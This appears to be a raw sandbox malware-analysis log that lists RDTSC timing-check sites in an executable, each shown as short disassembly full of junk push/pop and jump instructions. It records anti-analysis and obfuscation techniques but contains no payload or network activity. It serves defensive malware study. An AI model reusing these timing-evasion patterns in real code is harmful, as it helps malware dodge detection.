Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2CF1 second address: 9E2D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8FA0CCCDD6h 0x0000000a jmp 00007F8FA0CCCDDBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2D06 second address: 9E2D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A489h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2D23 second address: 9E2D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8FA0CCCDE9h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jno 00007F8FA0CCCDE0h 0x00000013 push ebx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1858 second address: 9E1860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1860 second address: 9E1866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1866 second address: 9E186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E186A second address: 9E1876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8FA0CCCDD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1876 second address: 9E187C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E187C second address: 9E1886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FA0CCCDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1E1A second address: 9E1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1E20 second address: 9E1E24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1E24 second address: 9E1E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1F96 second address: 9E1FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F8FA0CCCDE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E212D second address: 9E2131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E22B5 second address: 9E22DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F8FA0CCCDE8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E22DA second address: 9E22E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E22E3 second address: 9E22E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E271E second address: 9E273C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8FA106A485h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E273C second address: 9E2740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2B26 second address: 9E2B5B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FA106A480h 0x00000011 jmp 00007F8FA106A489h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2B5B second address: 9E2B96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8FA0CCCDE8h 0x0000000f jmp 00007F8FA0CCCDE9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2B96 second address: 9E2BA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F8FA106A476h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8083 second address: 9E8089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8089 second address: 9E8093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8093 second address: 9E80A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8229 second address: 9E825E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F8FA106A481h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8FA106A483h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E825E second address: 9E8262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8262 second address: 9E8266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EB1FB second address: 9EB201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EB201 second address: 9EB20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F8FA106A476h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EB20E second address: 9EB212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EE7A2 second address: 9EE7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EE7A6 second address: 9EE7C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EE7C3 second address: 9EE7EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Fh 0x00000007 js 00007F8FA106A48Ah 0x0000000d jmp 00007F8FA106A47Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EE7EA second address: 9EE7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F8FA0CCCDDCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EE7F9 second address: 9EE800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEAF7 second address: 9EEAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2CDD second address: 9F2CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2E3D second address: 9F2E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2E41 second address: 9F2E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8FA106A49Fh 0x0000000c jmp 00007F8FA106A484h 0x00000011 jmp 00007F8FA106A485h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EC6D second address: 99EC92 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8FA0CCCDE7h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EC92 second address: 99EC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99EC96 second address: 99ECA0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99ECA0 second address: 99ED38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F8FA106A476h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jno 00007F8FA106A477h 0x00000013 mov ebx, dword ptr [ebp+12481DEEh] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F8FA106A478h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 sub edi, dword ptr [ebp+122D342Ah] 0x00000039 add eax, ebx 0x0000003b add dword ptr [ebp+122D1CA1h], ecx 0x00000041 push eax 0x00000042 jmp 00007F8FA106A482h 0x00000047 mov dword ptr [esp], eax 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F8FA106A478h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov dword ptr [ebp+122D1C02h], esi 0x0000006a push 00000004h 0x0000006c mov dword ptr [ebp+122D183Ah], ebx 0x00000072 mov dword ptr [ebp+122D1CEAh], esi 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b push esi 0x0000007c ja 00007F8FA106A476h 0x00000082 pop esi 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99ED38 second address: 99ED4A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8FA0CCCDD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99ED4A second address: 99ED57 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 967996 second address: 9679A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F32B1 second address: 9F32DE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8FA106A489h 0x00000013 jns 00007F8FA106A476h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F79ED second address: 9F7A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jno 00007F8FA0CCCDDEh 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7A09 second address: 9F7A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8FA106A484h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7A26 second address: 9F7A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7A2A second address: 9F7A53 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA106A476h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F8FA106A486h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7A53 second address: 9F7A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jg 00007F8FA0CCCDD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7D08 second address: 9F7D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F7E5F second address: 9F7E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F80FE second address: 9F8103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F825C second address: 9F8269 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8FA0CCCDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8269 second address: 9F8276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8FA106A476h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8276 second address: 9F8282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F8FA0CCCDD6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF36A second address: 9FF36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF36E second address: 9FF374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF374 second address: 9FF388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F8FA106A476h 0x0000000e je 00007F8FA106A476h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF388 second address: 9FF397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD392 second address: 9FD3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8FA106A476h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 jmp 00007F8FA106A484h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c jg 00007F8FA106A476h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD3C3 second address: 9FD3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD3C7 second address: 9FD3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jl 00007F8FA106A482h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD553 second address: 9FD55E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDB61 second address: 9FDB65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDB65 second address: 9FDB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDB7C second address: 9FDB8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FDE27 second address: 9FDE47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FA0CCCDE2h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE1AF second address: 9FE1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE1B3 second address: 9FE1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE1B9 second address: 9FE1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE1BF second address: 9FE1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE485 second address: 9FE494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8FA106A476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE494 second address: 9FE4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8FA0CCCDE0h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FE7AB second address: 9FE7C8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8FA106A485h 0x00000008 jmp 00007F8FA106A47Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FEA8E second address: 9FEAAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FEAAB second address: 9FEAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8FA106A476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FEAB5 second address: 9FEABF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF051 second address: 9FF06C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8FA106A485h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02A8E second address: A02AB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8FA0CCCDE6h 0x00000008 pop edx 0x00000009 je 00007F8FA0CCCDE2h 0x0000000f jns 00007F8FA0CCCDD6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E71 second address: A02E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E75 second address: A02E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E79 second address: A02E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F8FA106A47Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A02E8E second address: A02EA3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8FA0CCCDE0h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A03172 second address: A0317C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07B88 second address: A07B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A07B8C second address: A07B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8FA106A476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CCF second address: A10CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A10CD3 second address: A10CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0EEAB second address: A0EEB5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0EEB5 second address: A0EECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8FA106A476h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F8FA106A476h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0EECC second address: A0EED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0EED0 second address: A0EED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
